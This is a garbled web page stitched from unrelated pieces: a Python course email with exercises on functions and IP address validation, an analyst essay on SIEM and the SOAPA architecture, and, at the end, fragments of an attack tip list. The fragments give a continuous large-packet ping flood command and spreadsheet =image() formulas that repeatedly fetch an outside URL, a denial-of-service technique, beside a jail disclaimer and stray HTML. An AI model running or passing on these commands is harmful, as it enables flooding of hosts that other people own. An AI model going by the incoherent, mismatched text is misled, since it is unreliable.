DoD Cloud Computing Security
The second half of this course includes some important content for improving your Python programming. In particular, Class6 on Functions and Namespaces, Class8 on Modules, and Class9 on Classes and Objects.
In this email of Learning Python we are going to cover the following:
I. Introduction Week6
Length is 3 minutes
II. Functions, Part1
Length is 12 minutes
Length is 10 minutes
IV. Functions, Part2
Length is 12 minutes
Additional content that you may be interested in
There is a good chapter on functions in “Learn Python the Hard Way” (I would stop after you finish, “What You Should See”).
Darren O’Connor has a blog on “Defined Functions – Python”.
Reference code for these exercises is posted on GitHub at:
1. Create a function that returns the multiplication product of three parameters–x, y, and z. z should have a default value of 1.
a. Call the function with all positional arguments.
b. Call the function with all named arguments.
c. Call the function with a mix of positional and named arguments.
d. Call the function with only two arguments and use the default value for z.
2. Write a function that converts a list to a dictionary where the index of the list is used as the key to the new dictionary (the function should return the new dictionary).
3a.Convert the IP address validation code (Class4, exercise1) into a function, take one variable ‘ip_address’ and return either True or False (depending on whether ‘ip_address’ is a valid IP). Only include IP address checking in the function–no prompting for input, no printing to standard output.
3b. Import this IP address validation function into the Python interpreter shell and test it (use both ‘import x’ and ‘from x import y’).
4. Create a function using your dotted decimal to binary conversion code from Class3, exercise1. In the function–do not prompt for input and do not print to standard output. The function should take one variable ‘ip_address’ and should return the IP address in dotted binary format always padded to eight binary digits (for example 00001010.01011000.00010001.00010111). You might want to create other functions as well (for example, the zero-padding to eight binary digits).
5. Write a program that prompts a user for an IP address, then checks if the IP address is valid, and then converts the IP address to binary (dotted decimal format). Re-use the functions created in exercises 3 and 4 (‘import’ the functions into your new program).
A. Why write functions?
II. Functions Part1
A. Function with no parameters
1. Syntax and structure
2. Calling the function
3. Return value
4. Using the return value
B. Function with parameters
2. Default values
C. Various ways of passing arguments to functions
1. Positional arguments
2. Named arguments
3. Mixing positional and named arguments
III. Python Namespaces
A. Functions create their own namespace
B. Name resolution order
IV. Functions Part2
A. Using lists and dicts as function arguments
B. Importing a function
Security information and event management (SIEM) systems have been around for a dozen years or so. During that timeframe, SIEMs evolved from perimeter security event correlation tools, to GRC platforms, to security analytics systems. Early vendors like eSecurity, GuardedNet, Intellitactics, and NetForensics, are distant memories; today’s SIEM market is now dominated by a few leaders: LogRhythm, McAfee (aka: Nitro Security), HP (aka: ArcSight), IBM (aka: QRadar), and Splunk.
Of course, there is a community of innovative upstarts that believe that SIEM is a legacy technology. They proclaim that log management and event correlation can’t keep up with the pace of cybersecurity today, thus you need new technologies like artificial intelligence, machine learning algorithms, and neural networks to consume, process, and analyze security data in real-time.
As an industry analyst, I should be waving my arms around madly, proclaiming that “SIEM is dead,” since that’s what those in my profession tend to do. Sorry, but I don’t think SIEM is dead at all. Instead, enterprise security operations and analytics requirements are forcing rapid consolidation into something new that ESG calls a security operations and analytics platform architecture (SOAPA).
Within SOAPA, SIEM -like functionality still plays a starring role, often aggregating analytics data into a common repository. But unlike the past, SIEM is one of several security tools within SOAPA, and these technologies must be designed for asynchronous cooperation so security analysts can quickly pivot across tools to find data and take action as they need to in real-time.
SOAPA is a dynamic architecture, meaning that new data sources and control planes will be added incrementally overtime. I do believe, however, that today’s SOAPA is built with SIEMs (or similar log management and search products/services) and:
Aside from the technologies themselves, here are a few other thoughts on SOAPA:
“In order to protect one must understand how to exploit” – me just now
ping [ip address] -t -l 65500
<pre>=image("http://example.com/sample.pdf?r=0") =image("http://example.com/sample.pdf?r=1") =image("http://example.com/sample.pdf?r=2")</pre> </li> <li>
Disclaimer: Most countries have very stick Telecommunications and Computer Abuse laws. Just running these commands against anyone could put you in jail for 99 years. These tools are easily detected.